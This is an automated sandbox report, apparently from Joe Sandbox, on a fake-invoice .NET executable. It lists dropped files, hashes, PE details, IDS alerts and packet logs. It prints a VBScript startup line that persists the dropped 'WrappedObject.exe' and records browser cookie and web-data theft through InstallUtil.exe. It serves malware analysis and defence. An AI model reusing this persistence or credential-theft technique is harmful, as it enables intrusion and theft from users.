                                                                                        Category:modified
                                                                                        Size (bytes):1089
                                                                                        Entropy (8bit):5.3331074454898735
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:ML9E4KlKNE4oK2nMK/KDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlIHoVnM6YHKh3oPtHo6hAHKzeR
                                                                                        MD5:E54FE55F93C5501D5C4737CCF0E6E48B
                                                                                        SHA1:BEF9C1A7166E3E8C2C7762C42F8FCBB753B63283
                                                                                        SHA-256:2434AE4C4C8436A64A4F3317638DF77C38CB7FFC226037ADE1DC6F6CD4745619
                                                                                        SHA-512:5422F02595B12ACFE23AF8C69ACF43B5529C700FC3FA5ADEDDBDFF36737C22D7AE23FCD4A39869DF6D02D7D708F951142983E60ED90EADFDCE5CC40B164AD19D
                                                                                        Malicious:false
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\48ee4ec9441351bbe4d9095c96b8ea01\System.Configuration.Install.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\Nati

                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WrappedObject.vbs

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\Factura modificada____678979879.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):92
                                                                                        Entropy (8bit):4.782397088017865
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:FER/n0eFHHo0nacwREaKC5t/kqjnn:FER/lFHIcNwiaZ5t8i
                                                                                        MD5:246B0D38640BEE8EFF085F90EE75ECF0
                                                                                        SHA1:EE2C4E6DB812F6FC1A57D6F67A9A96875BA7D103
                                                                                        SHA-256:EBE463BD33619FC4C1954522C1D13403A889EB1405B6E8A2FBD8610C220F2A0A
                                                                                        SHA-512:70DFBF98A472B5E45598CFA5E7F34E3386A709640F7DBD5F9B8B8CAABB91508FEBC7BA1DF937A2FC30EB5BBF117AF6849049D28CC4B8471948983DA75C634367
                                                                                        Malicious:true
                                                                                        Reputation:low
                                                                                        Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\WrappedObject.exe"""

                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\LogfreezedJejbRsWuZJfPEdhhZqjCJQgvjEvfirmers

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                        Category:dropped
                                                                                        Size (bytes):40960
                                                                                        Entropy (8bit):0.8553638852307782
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\WebData

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                        Category:dropped
                                                                                        Size (bytes):196608
                                                                                        Entropy (8bit):1.1215420383712111
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                                        MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                                        SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                                        SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                                        SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\cookies.db

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                        Category:modified
                                                                                        Size (bytes):98304
                                                                                        Entropy (8bit):0.08235737944063153
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\cookies.db-shm

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):32768
                                                                                        Entropy (8bit):0.017262956703125623
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                        Malicious:false
                                                                                        Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exe

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:modified
                                                                                        Size (bytes):42064
                                                                                        Entropy (8bit):6.19564898727408
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:qtpFVLK0MsihB9VKS7xdgl6KJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+RPZTg:GBMs2SqdSZ6Iq8BxTfqWR8h7ukP
                                                                                        MD5:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                        SHA1:F0209900FBF08D004B886A0B3BA33EA2B0BF9DA8
                                                                                        SHA-256:AC1A3F21FCC88F9CEE7BF51581EAFBA24CC76C924F0821DEB2AFDF1080DDF3D3
                                                                                        SHA-512:9AC94880684933BA3407CDC135ABC3047543436567AF14CD9269C4ADC5A6535DB7B867D6DE0D6238A21B94E69F9890DBB5739155871A624520623A7E56872159
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Joe Sandbox View:
                                                                                        • Filename: Lista de cotizaciones.exe, Detection: malicious, Browse
                                                                                        • Filename: ORDER REF_47806798 .exe, Detection: malicious, Browse
                                                                                        • Filename: chiara.exe, Detection: malicious, Browse
                                                                                        • Filename: Bank Details.exe, Detection: malicious, Browse
                                                                                        • Filename: Signed Document..exe, Detection: malicious, Browse
                                                                                        • Filename: PO CONTRACT.exe, Detection: malicious, Browse
                                                                                        • Filename: image.exe, Detection: malicious, Browse
                                                                                        • Filename: ABA NEW ORDER No.2400228341.pdf.exe, Detection: malicious, Browse
                                                                                        • Filename: 09099627362726.exe, Detection: malicious, Browse
                                                                                        • Filename: SecuriteInfo.com.Win32.TrojanX-gen.10530.8108.exe, Detection: malicious, Browse
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,>.]..............0..T...........r... ........@.. ....................................`.................................4r..O....................b..PB...........p............................................... ............... ..H............text....R... ...T.................. ..`.rsrc................V..............@..@.reloc...............`..............@..B................hr......H........"..|J..........lm.......o......................................2~.....o....*.r...p(....*VrK..p(....s.........*..0..........(....(....o....o....(....o.... .....T(....o....(....o....o ...o!....4(....o....(....o....o ...o".....(....rm..ps#...o....($........(%....o&....ry..p......%.r...p.%.(.....(....('....((.......o)...('........*.*................"..(*...*..{Q...-...}Q.....(+...(....(,....(+...*"..(-...*..(....*..(.....r...p.(/...o0...s....}T...*....0.. .......~S...-.s

                                                                                        C:\Users\user\AppData\Roaming\WrappedObject.exe

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\Factura modificada____678979879.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):3441152
                                                                                        Entropy (8bit):5.35267830391893
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:4V3QLwfWL5YRJ1oyHL8tLP5odZztHdmZiNeWC8OmyR5BJHEBbrP2gq:aWVYRJ1fsP5QdyLB6BbrP2g
                                                                                        MD5:99B76D55171F966B58012DAF261412F1
                                                                                        SHA1:A9175919C8AC3B177259C8965CDF04E82CC159AA
                                                                                        SHA-256:4A2C971C295D5F317A2AEF95A404322E7FCD0D3A74200E4FE30B9E46DA623CFB
                                                                                        SHA-512:728981328B78477DE3D09CFA634DE839B7C34111009327E255E56B110C98D6EB00094141206AD1E1EAEAE4973D76B53B250789470D8B4DA1298E318EA7B3547B
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 58%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...=f7g.................x4..........4.. ....4...@.. ........................4...........`...................................4.K.....4.......................4...................................................... ............... ..H............text....w4.. ...x4................. ..`.rsrc.........4......z4.............@..@.reloc........4.......4.............@..B..................4.....H........$%..r...........................................................*...(....*...(....*.0..T....... ........8........E............8....*s....(....o....& ....~z...{....9....& ....8....&~.......*...~....*..0../.........(....}.......}......|......(...+..|....(....*...(....*.0.......... ........8........E........1...D...2.......8.....|......(.... ....~z...{~...9....& ....8....*.{...... ....8.......:.... ....8........E....#.......f.......K...P.......................4..._.....

                                                                                        C:\Users\user\AppData\Roaming\WrappedObject.exe:Zone.Identifier

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\Factura modificada____678979879.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:modified
                                                                                        Size (bytes):26
                                                                                        Entropy (8bit):3.95006375643621
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                        Malicious:true
                                                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                                                        \Device\ConDrv

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):2017
                                                                                        Entropy (8bit):4.659840607039457
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:zK4QsD4ql0+1AcJRy0EJP64gFljVlWo3ggxUnQK2qmBvgw1+5:zKgDEcTytNe3Wo3uQVBIe+5
                                                                                        MD5:3BF802DEB390033F9A89736CBA5BFAFF
                                                                                        SHA1:25A7177A92E0283B99C85538C4754A12AC8AD197
                                                                                        SHA-256:5202EB464D6118AC60F72E89FBAAACF1FB8CF6A232F98F47F88D0E7B2F3AFDB3
                                                                                        SHA-512:EB4F440D28ECD5834FD347F43D4828CA9FEE900FF003764DD1D18B95E0B84E414EAECF70D75236A1463366A189BC5CBA21613F79B5707BF7BDB3CEA312CCE4F7
                                                                                        Malicious:false
                                                                                        Preview:Microsoft (R) .NET Framework Installation utility Version 4.8.4084.0..Copyright (C) Microsoft Corporation. All rights reserved.....Usage: InstallUtil [/u | /uninstall] [option [...]] assembly [[option [...]] assembly] [...]]....InstallUtil executes the installers in each given assembly...If the /u or /uninstall switch is specified, it uninstalls..the assemblies, otherwise it installs them. Unlike other..options, /u applies to all assemblies, regardless of where it..appears on the command line.....Installation is done in a transactioned way: If one of the..assemblies fails to install, the installations of all other..assemblies are rolled back. Uninstall is not transactioned.....Options take the form /switch=[value]. Any option that occurs..before the name of an assembly will apply to that assembly's..installation. Options are cumulative but overridable - options..specified for one assembly will apply to the next as well unless..the option is specified with a new value. The default for

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Entropy (8bit):5.35267830391893
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                        File name:Factura modificada____678979879.exe
                                                                                        File size:3'441'152 bytes
                                                                                        MD5:99b76d55171f966b58012daf261412f1
                                                                                        SHA1:a9175919c8ac3b177259c8965cdf04e82cc159aa
                                                                                        SHA256:4a2c971c295d5f317a2aef95a404322e7fcd0d3a74200e4fe30b9e46da623cfb
                                                                                        SHA512:728981328b78477de3d09cfa634de839b7c34111009327e255e56b110c98d6eb00094141206ad1e1eaeae4973d76b53b250789470d8b4da1298e318ea7b3547b
                                                                                        SSDEEP:24576:4V3QLwfWL5YRJ1oyHL8tLP5odZztHdmZiNeWC8OmyR5BJHEBbrP2gq:aWVYRJ1fsP5QdyLB6BbrP2g
                                                                                        TLSH:52F5B507B78A89F1C16B0B36C7EB021623A7FBC17733C61A7D892B660657356994C70B
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...=f7g.................x4...........4.. ....4...@.. ........................4...........`................................

                                                                                        File Icon

                                                                                        Icon Hash:00928e8e8686b000

                                                                                        Static PE Info

                                                                                        General

                                                                                        Entrypoint:0x7497ce
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x6737663D [Fri Nov 15 15:18:21 2024 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                        Entrypoint Preview

                                                                                        Instruction
                                                                                        jmp dword ptr [00402000h]
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al

                                                                                        Data Directories

                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x3497800x4b.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x34a0000x5a8.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x34c0000xc.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                        Sections

                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x20000x3477d40x347800c5fd692c2aa8ff4b2a9fc61499544b58unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rsrc0x34a0000x5a80x60050a664756fdb8063fad32457e9f445ebFalse0.4192708333333333data4.083666566934065IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .reloc0x34c0000xc0x20054957c826cfbedc6620e5e62ce066e81False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                        Resources

                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_VERSION0x34a0a00x31cdata0.4296482412060301
                                                                                        RT_MANIFEST0x34a3bc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                        Imports

                                                                                        DLLImport
                                                                                        mscoree.dll_CorExeMain

                                                                                        Network Behavior

                                                                                        Suricata IDS Alerts

                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-11-18T08:30:14.596800+01002017962ET MALWARE PE EXE or DLL Windows file download disguised as ASCII1218.208.91.137443192.168.2.749700TCP
                                                                                        2024-11-18T08:30:14.596800+01002022640ET MALWARE PE EXE or DLL Windows file download Text M21218.208.91.137443192.168.2.749700TCP
                                                                                        2024-11-18T08:30:24.505640+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749742162.55.60.280TCP
                                                                                        2024-11-18T08:30:37.368981+01002017962ET MALWARE PE EXE or DLL Windows file download disguised as ASCII1218.208.91.137443192.168.2.749808TCP
                                                                                        2024-11-18T08:30:37.368981+01002022640ET MALWARE PE EXE or DLL Windows file download Text M21218.208.91.137443192.168.2.749808TCP
                                                                                        2024-11-18T08:31:33.208464+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749974162.55.60.280TCP

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Nov 18, 2024 08:30:11.163088083 CET4969980192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:11.168251038 CET8049699218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:11.168333054 CET4969980192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:11.168972015 CET4969980192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:11.173878908 CET8049699218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:12.327896118 CET8049699218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:12.329276085 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:12.329318047 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:12.329395056 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:12.341819048 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:12.341840029 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:12.381382942 CET4969980192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:13.525321007 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:13.525403023 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:13.531064987 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:13.531073093 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:13.531415939 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:13.584561110 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:13.584901094 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:13.631357908 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.001255035 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.053283930 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:14.053307056 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.100182056 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:14.274014950 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.274029970 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.274064064 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.274081945 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.274100065 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.274169922 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:14.274195910 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.274224043 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:14.275836945 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.275846004 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.275861025 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.275870085 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.275948048 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:14.275959015 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.275981903 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:14.318923950 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:14.559119940 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.559134007 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.559155941 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.559164047 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.559282064 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:14.559324026 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.559395075 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:14.596849918 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.596863031 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.596880913 CET44349700218.208.91.137192.168.2.7
